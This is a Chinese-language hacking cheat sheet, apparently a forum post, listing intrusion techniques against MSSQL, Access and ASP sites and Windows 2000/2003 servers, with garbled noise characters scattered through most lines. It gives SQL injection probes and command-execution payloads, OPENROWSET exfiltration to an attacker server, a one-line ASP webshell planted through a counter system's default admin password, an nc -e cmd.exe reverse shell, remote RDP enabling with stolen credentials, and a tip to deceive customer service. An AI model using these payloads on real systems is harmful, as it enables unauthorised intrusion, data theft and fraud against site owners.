SA点数据库分离技术相关
& H, Q3 |% ^+ S/ A+ C4 b1 X
$ X9 u' c/ T% {$ `; V$ |- b! g/ U% G. `! u) W2 N
SA点数据库分离搞法+语句:
, @& b0 M! H3 \# R( u# L% ~2 {
3 e+ B2 O; X- m: h: B" e2 _9 U! v+ O注射点不显错,执行下面三条语句页面都返回正常。
& w& Y! }+ c" W; y- p8 X' W1 m# Band 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')2 Q( v7 k$ E. Q8 ~) r% N
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')5 @, \( e4 F {
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
) j; x) S* K% ]3 a' B1 @. Z可以列目录,判断系统为2000,web与数据库分离
7 h- p# @3 Q$ U$ \遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。& G$ m5 Y- Z' q9 P8 i9 |
在注射点上执行
9 `# W1 k6 C) Y! R" sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--0 o9 l9 q' [6 I$ @6 R; Q7 j' Z' C
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP0 D( l* j, |, c& E) h s
还有我用NC监听得其他端口都没有得到IP。
: G: w1 \0 ?; e
% s, H' x( u+ W- ^通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。" j" E. W5 X8 E- \8 v7 W: P
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
! h: g; x v" i. _+ D5 ^! H
; e' O" V( p; z$ m# d% v+ A2 a;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
/ J& f4 I( G" Y1 Z/ u3 @8 M+ g
# c$ J4 S' C3 w* s* p现在就猜想是不是数据库是内网而且不能连外网。# C3 F% A/ h6 s% V) E9 ?- T
# ]% U [9 X+ f0 ~
! }4 P' N- P2 t5 D1 w# k* L% f% S
access导出txt文本代码4 q& X- q& ?3 R
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin I) @+ u4 g5 L# m2 z4 z
, s/ A( e+ ^; m' f( X" a; v! b
3 A" e8 y4 \3 h
2 J, a9 _0 l, S1 O自动跳转到指定网站代码头2 J2 \+ g; b, a+ M+ c, u
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
1 t; O' d/ n! G7 ?- b X* g1 z! S w7 v- @
' C5 `- W1 S$ P9 e8 a% p' t
入侵java or jsp站点时默认配置文件路径:
7 T1 k, o! e7 u7 ^% L4 ^8 g\web-inf\web.xml8 \/ e3 A' \* [) n
tomcat下的配置文件位置:; B0 N) ^+ V5 t* S7 Z( \& |8 k
\conf\server.xml (前面加上tomcat路径); B( N3 E# p8 s
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
" l; u4 u( V. Y; D* ?! ] ?+ ?; _+ {# r9 G8 {
+ D. m0 j. E# y. }: Y; ~1 V/ V/ p1 h
3 e8 `6 U/ n8 v" K& L检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
$ u; [% l0 I) n/ r; D) i; O8 t-1%235 p8 n3 t" ~- @% B6 D2 a
> ! U' v9 L5 U4 ]9 H5 z
<
1 W8 t7 R% z3 H$ w/ f1'+or+'1'='1. g; q% E1 t+ Y+ K, ]5 @ m9 [
id=8%bf0 G b) X: x( V1 f
# L* ?/ _- B" P D3 h# b" b全新注入点检测试法:# U* C% Z1 n* K4 l: [: `
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
4 r2 Y& A. S# j) D3 Z6 T! o& r. p* W: O+ G5 u7 w& i. k
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
% ?6 _ J0 g, Q: j: d7 L& g- o- B- R2 C" L
搜索型注入判断方法:* W" Z) ?1 s' R" S
北京%' and '1'='1' and '%'='9 \" l+ I! s I5 P( C! E
北京%' and '1'='2' and '%'='
) @# L; _! V( W# n8 C
0 a- l/ D' f4 i9 \ n3 p9 }( I+ p4 e# m( J& o; x9 H9 Q
COOKIES注入:
+ `( }% B% `+ h; Z8 ?$ U
; _2 |3 d) }( q3 B' n" Ojavascript:alert(document.cookie="id="+escape("51 and 1=1"));
1 p1 h; J6 X* ? S# |2 p7 N- R
5 A" q! J- ~/ W% D2000专业版查看本地登录用户命令:
. q5 u$ H, B2 y6 Inet config workstation! x' E5 W0 S7 x' h2 T
6 R5 f4 }" m" _; E, Q }
2 a& R; W* V' J8 t& c3 `2003下查看ipsec配置和默认防火墙配置命令:
/ D; E9 F" ~9 B8 l, @/ W) Fnetsh firewall show config
2 i: Z; h7 |2 ^; N+ d' p" S# ^netsh ipsec static show all
4 z8 ~* m! f" Q7 W5 E; Y, G- L' ^* w1 t
不指派指定策略命令:: N1 w- b7 u9 }8 o
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
6 [, d# ~" o! M0 fnetsh ipsec static show policy all 显示策略名
* f# E+ P4 e+ m8 K
* n% n* z: B! O7 Q3 q# ~1 p! u2 \7 x, k4 H
猜管理员后台小技巧:
. l& F* F( b& J$ u, s {: ?admin/left.asp / z0 X6 G/ y! r/ B" Q# [
admin/main.asp
8 Y. b* n: w8 _9 c3 cadmin/top.asp
5 b, p3 @8 X P* p; i& Q6 r+ yadmin/admin.asp ) }- l0 j' Z* @8 f+ r( Z4 B- C. ?
会现出菜单导航,然后迅雷下载全部链接
/ y* C5 D6 f0 P1 u
. N) E2 w* ~: U- O/ g2 ~& Q9 M
社会工程学:
9 [ }/ \( t4 B. f3 W0 G用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
* w% v9 _- F3 x+ N* j然后去骗客服
8 e& h/ Z- ^, W+ P: F# A8 Q5 Y2 b1 Q8 I+ ^
& [5 {$ \, j5 V
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
9 T' j" u9 k5 O, N4 E" D8 U7 \9 B _查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
9 G* P' u/ o9 E! v- k 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
; d3 y2 V$ t$ Z7 z' C, b- Z& s* |6 Q
6 w$ ^( V0 j+ z
; ]* f% y% G, @# \0 }, j" R- B$ s" ^# a' j1 f
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
' ^9 s- l% D9 a9 u
x- e) m; G1 }% M) a* e' R* s* w" t" _- G) T; G# g& D
2 [2 s) }1 W5 J) K/ ^
CMD加密注册表位置
/ N. [$ D1 K6 S9 ] V9 {8 I+ a(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
7 U! l+ [; \: g1 v, DAutoRun
/ c" U, l4 z* b# x, {) }' F0 i/ g
% N @( g' ^; ]# W8 L/ }(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
# H# H, z e! N- y6 nAutoRun
- P7 K4 n6 S" S( t g) w, s4 S
1 _" w) y: ], d9 R, m( n5 R9 [7 p5 _, e" o/ I
在找注入时搜索Hidden,把他改成test# a' i! ^4 ?* M% b* x" r& \+ t% [
H" }% h1 {- j5 [
& T, S. _: z% t6 k/ R+ \0 B y! _3 ^& W2 `+ ]+ W
mstsc /v:IP /console
. k5 X* S* x9 S
" y# ~! r m1 {" ~5 \; ]- T
3 h4 q* v8 \/ p6 P% M7 D一句话开3389:
9 }- I* @3 b# @: u$ g. d y% [( J0 B; N! c9 _4 a! Y
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
; O7 l3 M+ |, S e+ ~开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
@9 @3 ?, S$ ]5 b1 p% k2 R
, Y# E1 y% s/ ^* T# Y7 m
) ?: ^6 `6 y" v) L, z知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
D0 _% z) I0 V4 z3 eInsert into admin(user,pwd) values('test','test')6 y) n! d8 ]0 Z, O9 @
5 `/ Q0 ^5 s! r4 N: B6 m7 U9 c, U; T, v0 c) T
NC反弹8 X$ F. c* S) }/ U$ i
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
. Z& I/ Z4 }4 H然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)& C1 t. K& G4 m$ V4 ~
$ Q: L7 q. n6 U5 ^! v& s' @3 b5 ~5 I
* U+ ?5 ~. y; C' q; }8 r在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
2 A% D) G& O, m& Y
. B& G/ T" L+ y8 k+ p' f有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录% o* v" F& O- H* w
例如:! a4 J0 {* x" x4 u0 G) R F
subst k: d:\www\ 用d盘www目录替代k盘- ~% l4 a$ C/ I' p" ^( \" |
subst k: /d 解除K盘代替 |